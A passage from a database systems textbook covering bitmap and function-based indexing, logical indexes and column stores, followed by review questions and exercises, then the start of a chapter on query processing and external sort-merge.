only a few values, like the Sex column in Figure 16, retrieval of the Sex = M condi-
tion on average would retrieve 50 percent of the rows; in such cases, it is better to do
a complete scan rather than use bitmap indexing.

In general, bitmap indexes are efficient in terms of the storage space that they need.
If we consider a file of 1 million rows (records) with record size of 100 bytes per row,
each bitmap index would take up only one bit per row and hence would use 1 mil-
lion bits or 125 Kbytes. Suppose this relation is for 1 million residents of a state, and
they are spread over 200 ZIP Codes; the 200 bitmaps over Zipcodes contribute 200
bits (or 25 bytes) worth of space per row; hence, the 200 bitmaps occupy only 25
percent as much space as the data file. They allow an exact retrieval of all residents
who live in a given ZIP Code by yielding their Row_ids.

670

Indexing Structures for Files

When records are deleted, renumbering rows and shifting bits in bitmaps becomes
expensive. Another bitmap, called the existence bitmap, can be used to avoid this
expense. This bitmap has a 0 bit for the rows that have been deleted but are still
present and a 1 bit for rows that actually exist. Whenever a row is inserted in the
relation, an entry must be made in all the bitmaps of all the columns that have a
bitmap index; rows typically are appended to the relation or may replace deleted
rows. This process represents an indexing overhead.

Large bitvectors are handled by treating them as a series of 32-bit or 64-bit vectors,
and corresponding AND, OR, and NOT operators are used from the instruction set
to deal with 32- or 64-bit input vectors in a single instruction. This makes bitvector
operations computationally very efficient.

Bitmaps for B+-Tree Leaf Nodes. Bitmaps can be used on the leaf nodes of
B+-tree indexes as well as to point to the set of records that contain each specific
value of the indexed field in the leaf node. When the B+-tree is built on a nonkey
search field, the leaf record must contain a list of record pointers alongside each
value of the indexed attribute. For values that occur very frequently, that is, in a
large percentage of the relation, a bitmap index may be stored instead of the point-
ers. As an example, for a relation with n rows, suppose a value occurs in 10 percent
of the file records. A bitvector would have n bits, having the “1” bit for those Row_ids
that contain that search value, which is n/8 or 0.125n bytes in size. If the record
pointer takes up 4 bytes (32 bits), then the n/10 record pointers would take up
4 * n/10 or 0.4n bytes. Since 0.4n is more than 3 times larger than 0.125n, it is better
to store the bitmap index rather than the record pointers. Hence for search values
that occur more frequently than a certain ratio (in this case that would be 1/32), it is
beneficial to use bitmaps as a compressed storage mechanism for representing the
record pointers in B+-trees that index a nonkey field.

5.3 Function-Based Indexing
In this section we discuss a new type of indexing, called function-based indexing,
that has been introduced in the Oracle relational DBMS as well as in some other
commercial products.13

The idea behind function-based indexing is to create an index such that the value
that results from applying some function on a field or a collection of fields becomes
the key to the index. The following examples show how to create and use function-
based indexes.

Example 1. The following statement creates a function-based index on the
EMPLOYEE table based on an uppercase representation of the Lname column, which
can be entered in many ways but is always queried by its uppercase representation.

CREATE INDEX upper_ix ON Employee (UPPER(Lname));

13Rafi Ahmed contributed most of this section.

671

Indexing Structures for Files

This statement will create an index based on the function UPPER(Lname), which
returns the last name in uppercase letters; for example, UPPER(‘Smith’) will
return ‘SMITH’.

Function-based indexes ensure that Oracle Database system will use the index
rather than perform a full table scan, even when a function is used in the search
predicate of a query. For example, the following query will use the index:

SELECT First_name, Lname
FROM Employee
WHERE UPPER(Lname)= “SMITH”.

Without the function-based index, an Oracle Database might perform a full table
scan, since a B+-tree index is searched only by using the column value directly; the
use of any function on a column prevents such an index from being used.

Example 2. In this example, the EMPLOYEE table is supposed to contain two
fields—salary and commission_pct (commission percentage)—and an index is being
created on the sum of salary and commission based on the commission_pct.

CREATE INDEX income_ix
ON Employee(Salary + (Salary*Commission_pct));

The following query uses the income_ix index even though the fields salary and
commission_pct are occurring in the reverse order in the query when compared to
the index definition.

SELECT First_name, Lname
FROM Employee
WHERE ((Salary*Commission_pct) + Salary ) > 15000;

Example 3. This is a more advanced example of using function-based indexing to
define conditional uniqueness. The following statement creates a unique function-
based index on the ORDERS table that prevents a customer from taking advantage of
a promotion id (“blowout sale”) more than once. It creates a composite index on the
Customer_id and Promotion_id fields together, and it allows only one entry in the index
for a given Customer_id with the Promotion_id of “2” by declaring it as a unique index.

CREATE UNIQUE INDEX promo_ix ON Orders
(CASE WHEN Promotion_id = 2 THEN Customer_id ELSE NULL END,
CASE WHEN Promotion_id = 2 THEN Promotion_id ELSE NULL END);

Note that by using the CASE statement, the objective is to remove from the index any
rows where Promotion_id is not equal to 2. Oracle Database does not store in the B+-
tree index any rows where all the keys are NULL. Therefore, in this example, we map
both Customer_id and Promotion_id to NULL unless Promotion_id is equal to 2. The
result is that the index constraint is violated only if Promotion_id is equal to 2, for two
(attempted insertions of) rows with the same Customer_id value.

672

Indexing Structures for Files

6 Some General Issues
Concerning Indexing

6.1 Logical versus Physical Indexes
In the earlier discussion, we have assumed that the index entries (or ) always include a physical pointer Pr (or P) that specifies the physical record
address on disk as a block number and offset. This is sometimes called a physical
index, and it has the disadvantage that the pointer must be changed if the record is
moved to another disk location. For example, suppose that a primary file organiza-
tion is based on linear hashing or extendible hashing; then, each time a bucket is
split, some records are allocated to new buckets and hence have new physical
addresses. If there was a secondary index on the file, the pointers to those records
would have to be found and updated, which is a difficult task.

To remedy this situation, we can use a structure called a logical index, whose index
entries are of the form . Each entry has one value K for the secondary index-
ing field matched with the value Kp of the field used for the primary file organiza-
tion. By searching the secondary index on the value of K, a program can locate the
corresponding value of Kp and use this to access the record through the primary file
organization. Logical indexes thus introduce an additional level of indirection
between the access structure and the data. They are used when physical record
addresses are expected to change frequently. The cost of this indirection is the extra
search based on the primary file organization.

6.2 Discussion
In many systems, an index is not an integral part of the data file but can be created
and discarded dynamically. That is why it is often called an access structure.
Whenever we expect to access a file frequently based on some search condition
involving a particular field, we can request the DBMS to create an index on that
field. Usually, a secondary index is created to avoid physical ordering of the records
in the data file on disk.

The main advantage of secondary indexes is that—theoretically, at least—they can
be created in conjunction with virtually any primary record organization. Hence, a
secondary index could be used to complement other primary access methods such
as ordering or hashing, or it could even be used with mixed files. To create a B+-tree
secondary index on some field of a file, we must go through all records in the file to
create the entries at the leaf level of the tree. These entries are then sorted and filled
according to the specified fill factor; simultaneously, the other index levels are cre-
ated. It is more expensive and much harder to create primary indexes and clustering
indexes dynamically, because the records of the data file must be physically sorted
on disk in order of the indexing field. However, some systems allow users to create
these indexes dynamically on their files by sorting the file during index creation.

It is common to use an index to enforce a key constraint on an attribute. While
searching the index to insert a new record, it is straightforward to check at the same

673

Indexing Structures for Files

time whether another record in the file—and hence in the index tree—has the same
key attribute value as the new record. If so, the insertion can be rejected.

If an index is created on a nonkey field, duplicates occur; handling of these dupli-
cates is an issue the DBMS product vendors have to deal with and affects data stor-
age as well as index creation and management. Data records for the duplicate key
may be contained in the same block or may span multiple blocks where many dupli-
cates are possible. Some systems add a row id to the record so that records with
duplicate keys have their own unique identifiers. In such cases, the B+-tree index
may regard a combination as the de facto key for the index, turning
the index into a unique index with no duplicates. The deletion of a key K from such
an index would involve deleting all occurrences of that key K—hence the deletion
algorithm has to account for this.

In actual DBMS products, deletion from B+-tree indexes is also handled in various
ways to improve performance and response times. Deleted records may be marked
as deleted and the corresponding index entries may also not be removed until a
garbage collection process reclaims the space in the data file; the index is rebuilt
online after garbage collection.

A file that has a secondary index on every one of its fields is often called a fully
inverted file. Because all indexes are secondary, new records are inserted at the end
of the file; therefore, the data file itself is an unordered (heap) file. The indexes are
usually implemented as B+-trees, so they are updated dynamically to reflect inser-
tion or deletion of records. Some commercial DBMSs, such as Software AG’s
Adabas, use this method extensively.

We referred to the popular IBM file organization called ISAM in Section 2. Another
IBM method, the virtual storage access method (VSAM), is somewhat similar to the
B+–tree access structure and is still being used in many commercial systems.

6.3 Column-Based Storage of Relations
There has been a recent trend to consider a column-based storage of relations as an
alternative to the traditional way of storing relations row by row. Commercial rela-
tional DBMSs have offered B+-tree indexing on primary as well as secondary keys as
an efficient mechanism to support access to data by various search criteria and the
ability to write a row or a set of rows to disk at a time to produce write-optimized
systems. For data warehouses, which are read-only databases, the column-based
storage offers particular advantages for read-only queries. Typically, the column-
store RDBMSs consider storing each column of data individually and afford per-
formance advantages in the following areas:

■ Vertically partitioning the table column by column, so that a two-column
table can be constructed for every attribute and thus only the needed
columns can be accessed

■ Use of column-wise indexes (similar to the bitmap indexes discussed in
Section 5.2) and join indexes on multiple tables to answer queries without
having to access the data tables

674

Indexing Structures for Files

■ Use of materialized views to support queries on multiple columns

Column-wise storage of data affords additional freedom in the creation of indexes,
such as the bitmap indexes discussed earlier. The same column may be present in
multiple projections of a table and indexes may be created on each projection. To
store the values in the same column, strategies for data compression, null-value sup-
pression, dictionary encoding techniques (where distinct values in the column are
assigned shorter codes), and run-length encoding techniques have been devised.
MonetDB/X100, C-Store, and Vertica are examples of such systems. Further discus-
sion on column-store DBMSs can be found in the references mentioned in this
chapter’s Selected Bibliography.

7 Summary
In this chapter we presented file organizations that involve additional access struc-
tures, called indexes, to improve the efficiency of retrieval of records from a data file.
These access structures may be used in conjunction with primary file organizations,
which are used to organize the file records themselves on disk.

Three types of ordered single-level indexes were introduced: primary, clustering, and
secondary. Each index is specified on a field of the file. Primary and clustering
indexes are constructed on the physical ordering field of a file, whereas secondary
indexes are specified on nonordering fields as additional access structures to improve
performance of queries and transactions. The field for a primary index must also be
a key of the file, whereas it is a nonkey field for a clustering index. A single-level index
is an ordered file and is searched using a binary search. We showed how multilevel
indexes can be constructed to improve the efficiency of searching an index.

Next we showed how multilevel indexes can be implemented as B-trees and B+-
trees, which are dynamic structures that allow an index to expand and shrink
dynamically. The nodes (blocks) of these index structures are kept between half full
and completely full by the insertion and deletion algorithms. Nodes eventually sta-
bilize at an average occupancy of 69 percent full, allowing space for insertions with-
out requiring reorganization of the index for the majority of insertions. B+-trees
can generally hold more entries in their internal nodes than can B-trees, so they may
have fewer levels or hold more entries than does a corresponding B-tree.

We gave an overview of multiple key access methods, and showed how an index can
be constructed based on hash data structures. We discussed the hash index in some
detail—it is a secondary structure to access the file by using hashing on a search key
other than that used for the primary organization. Bitmap indexing is another
important type of indexing used for querying by multiple keys and is particularly
applicable on fields with a small number of unique values. Bitmaps can also be used
at the leaf nodes of B+ tree indexes as well. We also discussed function-based index-
ing, which is being provided by relational vendors to allow special indexes on a
function of one or more attributes.

675

Indexing Structures for Files

We introduced the concept of a logical index and compared it with the physical
indexes we described before. They allow an additional level of indirection in index-
ing in order to permit greater freedom for movement of actual record locations on
disk. We also reviewed some general issues related to indexing, and commented on
column-based storage of relations, which has particular advantages for read-only
databases. Finally, we discussed how combinations of the above organizations can
be used. For example, secondary indexes are often used with mixed files, as well as
with unordered and ordered files.

Review Questions
1. Define the following terms: indexing field, primary key field, clustering field,

secondary key field, block anchor, dense index, and nondense (sparse) index.

2. What are the differences among primary, secondary, and clustering indexes?
How do these differences affect the ways in which these indexes are imple-
mented? Which of the indexes are dense, and which are not?

3. Why can we have at most one primary or clustering index on a file, but sev-
eral secondary indexes?

4. How does multilevel indexing improve the efficiency of searching an index
file?

5. What is the order p of a B-tree? Describe the structure of B-tree nodes.

6. What is the order p of a B+-tree? Describe the structure of both internal and
leaf nodes of a B+-tree.

7. How does a B-tree differ from a B+-tree? Why is a B+-tree usually preferred
as an access structure to a data file?

8. Explain what alternative choices exist for accessing a file based on multiple
search keys.

9. What is partitioned hashing? How does it work? What are its limitations?

10. What is a grid file? What are its advantages and disadvantages?

11. Show an example of constructing a grid array on two attributes on some file.

12. What is a fully inverted file? What is an indexed sequential file?

13. How can hashing be used to construct an index?

14. What is bitmap indexing? Create a relation with two columns and sixteen
tuples and show an example of a bitmap index on one or both.

15. What is the concept of function-based indexing? What additional purpose
does it serve?

16. What is the difference between a logical index and a physical index?

17. What is column-based storage of a relational database?

676

Indexing Structures for Files

Exercises
18. Consider a disk with block size B = 512 bytes. A block pointer is P = 6 bytes

long, and a record pointer is PR = 7 bytes long. A file has r = 30,000
EMPLOYEE records of fixed length. Each record has the following fields: Name
(30 bytes), Ssn (9 bytes), Department_code (9 bytes), Address (40 bytes),
Phone (10 bytes), Birth_date (8 bytes), Sex (1 byte), Job_code (4 bytes), and
Salary (4 bytes, real number). An additional byte is used as a deletion marker.

a. Calculate the record size R in bytes.

b. Calculate the blocking factor bfr and the number of file blocks b, assum-
ing an unspanned organization.

c. Suppose that the file is ordered by the key field Ssn and we want to con-
struct a primary index on Ssn. Calculate (i) the index blocking factor bfri
(which is also the index fan-out fo); (ii) the number of first-level index
entries and the number of first-level index blocks; (iii) the number of lev-
els needed if we make it into a multilevel index; (iv) the total number of
blocks required by the multilevel index; and (v) the number of block
accesses needed to search for and retrieve a record from the file—given its
Ssn value—using the primary index.

d. Suppose that the file is not ordered by the key field Ssn and we want to
construct a secondary index on Ssn. Repeat the previous exercise (part c)
for the secondary index and compare with the primary index.

e. Suppose that the file is not ordered by the nonkey field Department_code
and we want to construct a secondary index on Department_code, using
option 3 of Section 1.3, with an extra level of indirection that stores
record pointers. Assume there are 1,000 distinct values of
Department_code and that the EMPLOYEE records are evenly distributed
among these values. Calculate (i) the index blocking factor bfri (which is
also the index fan-out fo); (ii) the number of blocks needed by the level of
indirection that stores record pointers; (iii) the number of first-level
index entries and the number of first-level index blocks; (iv) the number
of levels needed if we make it into a multilevel index; (v) the total number
of blocks required by the multilevel index and the blocks used in the extra
level of indirection; and (vi) the approximate number of block accesses
needed to search for and retrieve all records in the file that have a specific
Department_code value, using the index.

f. Suppose that the file is ordered by the nonkey field Department_code and
we want to construct a clustering index on Department_code that uses
block anchors (every new value of Department_code starts at the beginning
of a new block). Assume there are 1,000 distinct values of
Department_code and that the EMPLOYEE records are evenly distributed
among these values. Calculate (i) the index blocking factor bfri (which is
also the index fan-out fo); (ii) the number of first-level index entries and
the number of first-level index blocks; (iii) the number of levels needed if
we make it into a multilevel index; (iv) the total number of blocks

677

Indexing Structures for Files

required by the multilevel index; and (v) the number of block accesses
needed to search for and retrieve all records in the file that have a specific
Department_code value, using the clustering index (assume that multiple
blocks in a cluster are contiguous).

g. Suppose that the file is not ordered by the key field Ssn and we want to
construct a B+-tree access structure (index) on Ssn. Calculate (i) the
orders p and pleaf of the B

+-tree; (ii) the number of leaf-level blocks
needed if blocks are approximately 69 percent full (rounded up for con-
venience); (iii) the number of levels needed if internal nodes are also 69
percent full (rounded up for convenience); (iv) the total number of blocks
required by the B+-tree; and (v) the number of block accesses needed to
search for and retrieve a record from the file—given its Ssn value—using
the B+-tree.

h. Repeat part g, but for a B-tree rather than for a B+-tree. Compare your
results for the B-tree and for the B+-tree.

19. A PARTS file with Part# as the key field includes records with the following
Part# values: 23, 65, 37, 60, 46, 92, 48, 71, 56, 59, 18, 21, 10, 74, 78, 15, 16, 20,
24, 28, 39, 43, 47, 50, 69, 75, 8, 49, 33, 38. Suppose that the search field values
are inserted in the given order in a B+-tree of order p = 4 and pleaf = 3; show
how the tree will expand and what the final tree will look like.

20. Repeat Exercise 19, but use a B-tree of order p = 4 instead of a B+-tree.

21. Suppose that the following search field values are deleted, in the given order,
from the B+-tree of Exercise 19; show how the tree will shrink and show the
final tree. The deleted values are 65, 75, 43, 18, 20, 92, 59, 37.

22. Repeat Exercise 21, but for the B-tree of Exercise 20.

23. Algorithm 1 outlines the procedure for searching a nondense multilevel pri-
mary index to retrieve a file record. Adapt the algorithm for each of the fol-
lowing cases:

a. A multilevel secondary index on a nonkey nonordering field of a file.
Assume that option 3 of Section 1.3 is used, where an extra level of indi-
rection stores pointers to the individual records with the corres-ponding
index field value.

b. A multilevel secondary index on a nonordering key field of a file.

c. A multilevel clustering index on a nonkey ordering field of a file.

24. Suppose that several secondary indexes exist on nonkey fields of a file,
implemented using option 3 of Section 1.3; for example, we could have sec-
ondary indexes on the fields Department_code, Job_code, and Salary of the
EMPLOYEE file of Exercise Describe an efficient way to search for and
retrieve records satisfying a complex selection condition on these fields, such
as (Department_code = 5 AND Job_code = 12 AND Salary = 50,000), using the
record pointers in the indirection level.

678

Indexing Structures for Files

25. Adapt Algorithms 2 and 3, which outline search and insertion procedures for
a B+-tree, to a B-tree.

26. It is possible to modify the B+-tree insertion algorithm to delay the case
where a new level is produced by checking for a possible redistribution of val-
ues among the leaf nodes. Figure 17 (next page) illustrates how this could be
done for our example in Figure 12; rather than splitting the leftmost leaf
node when 12 is inserted, we do a left redistribution by moving 7 to the leaf
node to its left (if there is space in this node). Figure 17 shows how the tree
would look when redistribution is considered. It is also possible to consider
right redistribution. Try to modify the B+-tree insertion algorithm to take
redistribution into account.

27. Outline an algorithm for deletion from a B+-tree.

28. Repeat Exercise 27 for a B-tree.

Selected Bibliography
Bayer and McCreight (1972) introduced B-trees and associated algorithms. Comer
(1979) provides an excellent survey of B-trees and their history, and variations of B-
trees. Knuth (1998) provides detailed analysis of many search techniques, including
B-trees and some of their variations. Nievergelt (1974) discusses the use of binary
search trees for file organization. Textbooks on file structures including Claybrook
(1992), Smith and Barnes (1987), and Salzberg (1988), the algorithms and data
structures textbook by Wirth (1985), as well as the database textbook by
Ramakrihnan and Gehrke (2003) discuss indexing in detail and may be consulted
for search, insertion, and deletion algorithms for B-trees and B+-trees. Larson
(1981) analyzes index-sequential files, and Held and Stonebraker (1978) compare
static multilevel indexes with B-tree dynamic indexes. Lehman and Yao (1981) and
Srinivasan and Carey (1991) did further analysis of concurrent access to B-trees.
The books by Wiederhold (1987), Smith and Barnes (1987), and Salzberg (1988),
among others, discuss many of the search techniques described in this chapter. Grid
files are introduced in Nievergelt et al. (1984). Partial-match retrieval, which uses
partitioned hashing, is discussed in Burkhard (1976, 1979).

New techniques and applications of indexes and B+-trees are discussed in Lanka
and Mays (1991), Zobel et al. (1992), and Faloutsos and Jagadish (1992). Mohan
and Narang (1992) discuss index creation. The performance of various B–tree and
B+-tree algorithms is assessed in Baeza-Yates and Larson (1989) and Johnson and
Shasha (1993). Buffer management for indexes is discussed in Chan et al. (1992).
Column-based storage of databases was proposed by Stonebraker et al. (2005) in the
C-Store database system; MonetDB/X100 by Boncz et al. (2008) is another imple-
mentation of the idea. Abadi et al. (2008) discuss the advantages of column stores
over row-stored databases for read-only database applications.

679

Indexing Structures for Files

1 0 3 0 5 0 7 0 8 0

3 5

Insert 12: overflow (left
redistribution)

Insert 9: overflow (new level)

Insert 6: overflow (split)

1 0 3 0 5 0 7 0 8 0 12 0

1 0 3 0 5 0 7 0 8 0 9 0 12 0

12 0

3 7

3 9

7

1 0 3 0 5 0 6 0 7 0 8 0 9 0

3 6 9

7

Figure 17
B+-tree insertion with left redistribution.

680

Name

Aaron, Ed

Abbott, Diane

Block 1

Acosta, Marc

Ssn Birth_date

Job Salary Sex

Adams, John

Adams, Robin

Block 2

Akers, Jan

Alexander, Ed

Alfred, Bob

Block 3

Allen, Sam

Allen, Troy

Anders, Keith

Block 4

Anderson, Rob

Anderson, Zach

Angeli, Joe

Block 5

Archer, Sue

Arnold, Mack

Arnold, Steven

Block 6

Atkins, Timothy

Wong, James

Wood, Donald

Block n–1

Woods, Manny

Wright, Pam

Wyatt, Charles

Block n

Zimmer, Byron

Figure A.1
Some blocks of an ordered
(sequential) file of EMPLOYEE
records with Name as the
ordering key field.

681

Indexing Structures for Files

Table A.1 Average Access Times for a File of b Blocks under Basic File Organizations

Average Blocks to Access
Type of Organization Access/Search Method a Specific Record

Heap (unordered) Sequential scan (linear search) b/2
Ordered Sequential scan b/2
Ordered Binary search log2 b

Global depth
d = 3

000

001

010

011

100

101

110

111

d´ = 3 Bucket for records
whose hash values
start with 000

Directory Data file buckets
Local depth of
each bucket

d´ = 3 Bucket for records
whose hash values
start with 001

d´ = 2 Bucket for records
whose hash values
start with 01

d´ = 2 Bucket for records
whose hash values
start with 10

d´ = 3 Bucket for records
whose hash values
start with 110

d´ = 3 Bucket for records
whose hash values
start with 111

Figure A.2
Structure of the
extendible hashing
scheme.

682

Indexing Structures for Files

Data File Buckets

Bucket for records
whose hash values
start with 000

Bucket for records
whose hash values
start with 001

Bucket for records
whose hash values
start with 01

Bucket for records
whose hash values
start with 10

Bucket for records
whose hash values
start with 110

Bucket for records
whose hash values
start with 111

Directory
0

1

0

1

0

1

0

1

0

1

internal directory node

leaf directory node

Figure A.3
Structure of the dynamic hashing scheme.

683

Algorithms for Query
Processing and Optimization

In this chapter we discuss the techniques used inter-nally by a DBMS to process, optimize, and execute
high-level queries. A query expressed in a high-level query language such as SQL
must first be scanned, parsed, and validated.1 The scanner identifies the query
tokens—such as SQL keywords, attribute names, and relation names—that appear
in the text of the query, whereas the parser checks the query syntax to determine
whether it is formulated according to the syntax rules (rules of grammar) of the
query language. The query must also be validated by checking that all attribute and
relation names are valid and semantically meaningful names in the schema of the
particular database being queried. An internal representation of the query is then
created, usually as a tree data structure called a query tree. It is also possible to rep-
resent the query using a graph data structure called a query graph. The DBMS must
then devise an execution strategy or query plan for retrieving the results of the
query from the database files. A query typically has many possible execution strate-
gies, and the process of choosing a suitable one for processing a query is known as
query optimization.

Figure 1 shows the different steps of processing a high-level query. The query opti-
mizer module has the task of producing a good execution plan, and the code gener-
ator generates the code to execute that plan. The runtime database processor has
the task of running (executing) the query code, whether in compiled or interpreted
mode, to produce the query result. If a runtime error results, an error message is
generated by the runtime database processor.

1We will not discuss the parsing and syntax-checking phase of query processing here; this material is
discussed in compiler textbooks.

From Chapter 19 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

684

Algorithms for Query Processing and Optimization

The term optimization is actually a misnomer because in some cases the chosen exe-
cution plan is not the optimal (or absolute best) strategy—it is just a reasonably effi-
cient strategy for executing the query. Finding the optimal strategy is usually too
time-consuming—except for the simplest of queries. In addition, trying to find the
optimal query execution strategy may require detailed information on how the files
are implemented and even on the contents of the files—information that may not
be fully available in the DBMS catalog. Hence, planning of a good execution strategy
may be a more accurate description than query optimization.

For lower-level navigational database languages in legacy systems—such as the
network DML or the hierarchical DL/1—the programmer must choose the query
execution strategy while writing a database program. If a DBMS provides only a
navigational language, there is limited need or opportunity for extensive query opti-
mization by the DBMS; instead, the programmer is given the capability to choose
the query execution strategy. On the other hand, a high-level query language—
such as SQL for relational DBMSs (RDBMSs) or OQL for object DBMSs
(ODBMSs)—is more declarative in nature because it specifies what the intended
results of the query are, rather than identifying the details of how the result should
be obtained. Query optimization is thus necessary for queries that are specified in
a high-level query language.

We will concentrate on describing query optimization in the context of an RDBMS
because many of the techniques we describe have also been adapted for other types

Query in a high-level language

Scanning, parsing, and validating

Immediate form of query

Query optimizer

Execution plan

Query code generator

Code to execute the query

Runtime database processor

Code can be:

Executed directly (interpreted mode)

Stored and executed later whenever
needed (compiled mode)

Result of query

Figure 1
Typical steps when
processing a high-level
query.

685

Algorithms for Query Processing and Optimization

2There are some query optimization problems and techniques that are pertinent only to ODBMSs.
However, we do not discuss them here because we give only an introduction to query optimization.

of database management systems, such as ODBMSs.2 A relational DBMS must sys-
tematically evaluate alternative query execution strategies and choose a reasonably
efficient or near-optimal strategy. Each DBMS typically has a number of general
database access algorithms that implement relational algebra operations such as
SELECT or JOIN or combinations of these operations. Only execution strategies that
can be implemented by the DBMS access algorithms and that apply to the particu-
lar query, as well as to the particular physical database design, can be considered by
the query optimization module.

This chapter starts with a general discussion of how SQL queries are typically trans-
lated into relational algebra queries and then optimized in Section 1. Then we dis-
cuss algorithms for implementing relational algebra operations in Sections 2
through 6. Following this, we give an overview of query optimization strategies.
There are two main techniques that are employed during query optimization. The
first technique is based on heuristic rules for ordering the operations in a query
execution strategy. A heuristic is a rule that works well in most cases but is not guar-
anteed to work well in every case. The rules typically reorder the operations in a
query tree. The second technique involves systematically estimating the cost of dif-
ferent execution strategies and choosing the execution plan with the lowest cost esti-
mate. These techniques are usually combined in a query optimizer. We discuss
heuristic optimization in Section 7 and cost estimation in Section 8. Then we pro-
vide a brief overview of the factors considered during query optimization in the
Oracle commercial RDBMS in Section 9. Section 10 introduces the topic of seman-
tic query optimization, in which known constraints are used as an aid to devising
efficient query execution strategies.

The topics covered in this chapter require that the reader be familiar with SQL, rela-
tional algebra, and file structures and indexing. Also, it is important to note that the
topic of query processing and optimization is vast, and we can only give an intro-
duction to the basic principles and techniques in this chapter.

1 Translating SQL Queries into Relational
Algebra

In practice, SQL is the query language that is used in most commercial RDBMSs. An
SQL query is first translated into an equivalent extended relational algebra expres-
sion—represented as a query tree data structure—that is then optimized. Typically,
SQL queries are decomposed into query blocks, which form the basic units that can
be translated into the algebraic operators and optimized. A query block contains a
single SELECT-FROM-WHERE expression, as well as GROUP BY and HAVING clauses
if these are part of the block. Hence, nested queries within a query are identified as

686

Algorithms for Query Processing and Optimization

separate query blocks. Because SQL includes aggregate operators—such as MAX,
MIN, SUM, and COUNT—these operators must also be included in the extended
algebra.

Consider the following SQL query on the EMPLOYEE relation in Figure A.1 (in
Appendix: Figures at the end of this chapter):

SELECT Lname, Fname
FROM EMPLOYEE
WHERE Salary > ( SELECT MAX (Salary)

FROM EMPLOYEE
WHERE Dno=5 );

This query retrieves the names of employees (from any department in the com-
pany) who earn a salary that is greater than the highest salary in department 5. The
query includes a nested subquery and hence would be decomposed into two blocks.
The inner block is:

( SELECT MAX (Salary)
FROM EMPLOYEE
WHERE Dno=5 )

This retrieves the highest salary in department 5. The outer query block is:

SELECT Lname, Fname
FROM EMPLOYEE
WHERE Salary > c

where c represents the result returned from the inner block. The inner block could
be translated into the following extended relational algebra expression:

ℑMAX Salary(σDno=5(EMPLOYEE))

and the outer block into the expression:

πLname,Fname(σSalary>c(EMPLOYEE))

The query optimizer would then choose an execution plan for each query block.
Notice that in the above example, the inner block needs to be evaluated only once to
produce the maximum salary of employees in department 5, which is then used—as
the constant c—by the outer block. We call this a nested query (without correlation
with the outer query). It is much harder to optimize the more complex correlated
nested queries, where a tuple variable from the outer query block appears in the
WHERE-clause of the inner query block.

2 Algorithms for External Sorting
Sorting is one of the primary algorithms used in query processing. For example,
whenever an SQL query specifies an ORDER BY-clause, the query result must be
sorted. Sorting is also a key component in sort-merge algorithms used for JOIN and
other operations (such as UNION and INTERSECTION), and in duplicate elimination
algorithms for the PROJECT operation (when an SQL query specifies the DISTINCT

687

Algorithms for Query Processing and Optimization

option in the SELECT clause). We will discuss one of these algorithms in this sec-
tion. Note that sorting of a particular file may be avoided if an appropriate index—
such as a primary or clustering index—exists on the desired file attribute to allow
ordered access to the records of the file.

External sorting refers to sorting algorithms that are suitable for large files of
records stored on disk that do not fit entirely in main memory, such as most data-
base files.3 The typical external sorting algorithm uses a sort-merge strategy, which
starts by sorting small subfiles—called runs—of the main file and then merges the
sorted runs, creating larger sorted subfiles that are merged in turn. The sort-merge
algorithm, like other database algorithms, requires buffer space in main memory,
where the actual sorting and merging of the runs is performed. The basic algorithm,
outlined in Figure 2, consists of two phases: the sorting phase and the merging
phase. The buffer space in main memory is part of the DBMS cache—an area in the
computer’s main memory that is controlled by the DBMS. The buffer space is
divided into individual buffers, where each buffer is the same size in bytes as the size
of one disk block. Thus, one buffer can hold the contents of exactly one disk block.

In the sorting phase, runs (portions or pieces) of the file that can fit in the available
buffer space are read into main memory, sorted using an internal sorting algorithm,
and written back to disk as temporary sorted subfiles (or runs). The size of each run
and the number of initial runs (nR) are dictated by the number of file blocks (b)
and the available buffer space (nB). For example, if the number of available main
memory buffers nB = 5 disk blocks and the size of the file b = 1024 disk blocks, then
nR= ⎡(b/nB)⎤ or 205 initial runs each of size 5 blocks (except the last run which will
have only 4 blocks). Hence, after the sorting phase, 205 sorted runs (or 205 sorted
subfiles of the original file) are stored as temporary subfiles on disk.

In the merging phase, the sorted runs are merged during one or more merge
passes. Each merge pass can have one or more merge steps. The degree of merging
(dM) is the number of sorted subfiles that can be merged in each merge step. During
each merge step, one buffer block is needed to hold one disk block from each of the
sorted subfiles being merged, and one additional buffer is needed for containing
one disk block of the merge result, which will produce a larger sorted file that is the
result of merging several smaller sorted subfiles. Hence, dM is the smaller of (nB − 1)
and nR, and the number of merge passes is ⎡(logdM(nR))⎤. In our example where nB =
5, dM = 4 (four-way merging), so the 205 initial sorted runs would be merged 4 at a
time in each step into 52 larger sorted subfiles at the end of the first merge pass.
These 52 sorted files are then merged 4 at a time into 13 sorted files, which are then
merged into 4 sorted files, and then finally into 1 fully sorted file, which means that
four passes are needed.

3Internal sorting algorithms are suitable for sorting data structures, such as tables and lists, that can fit
entirely in main memory. These algorithms are described in detail in data structures and algorithms
books, and include techniques such as quick sort, heap sort, bubble sort, and many others. We do not dis-
cuss these here.

688

Algorithms for Query Processing and Optimization

set i ← 1;
j ← b; {size of the file in blocks}
k ← nB; {size of buffer in blocks}
m ← ⎡( j/k)⎤;

{Sorting Phase}
while (i ≤ m)
do {

read next k blocks of the file into the buffer or if there are less than k blocks
remaining, then read in the remaining blocks;

sort the records in the buffer and write as a temporary subfile;
i ← i + 1;

}

{Merging Phase: merge subfiles until only 1 remains}
set i ← 1;

p ← ⎡logk–1m⎤ {p is the number of passes for the merging phase}
j ← m;

while (i ≤ p)
do {

n ← 1;
q ← ( j/(k–1)⎤ ; {number of subfiles to write in this pass}
while (n ≤ q)
do {

read next k–1 subfiles or remaining subfiles (from previous pass)
one block at a time;

merge and write as new subfile one block at a time;
n ← n + 1;

}
j ← q;
i ← i + 1;

}

Figure 2
Outline of the sort-merge algorithm for external sorting.

The performance of the sort-merge algorithm can be measured in the number of
disk block reads and writes (between the disk and main memory) before the sorting
of the whole file is completed. The following formula approximates this cost:

(2 * b) + (2 * b * (logdM nR))

The first term (2 * b) represents the number of block accesses for the sorting phase,
since each file block is accessed twice: once for reading into a main memory buffer
and once for writing the sorted records back to disk into one of the sorted subfiles.
The second term represents the number of block accesses for the merging phase.
During each merge pass, a number of disk blocks approximately equal to the origi-
nal file blocks b is read and written. Since the number of merge passes is (logdM nR),
we get the total merge cost of (2 * b * (logdM nR)).

689

Algorithms for Query Processing and Optimization

The minimum number of main memory buffers needed is nB = 3, which gives a dM
of 2 and an nR of ⎡(b/3)⎤. The minimum dM of 2 gives the worst-case performance
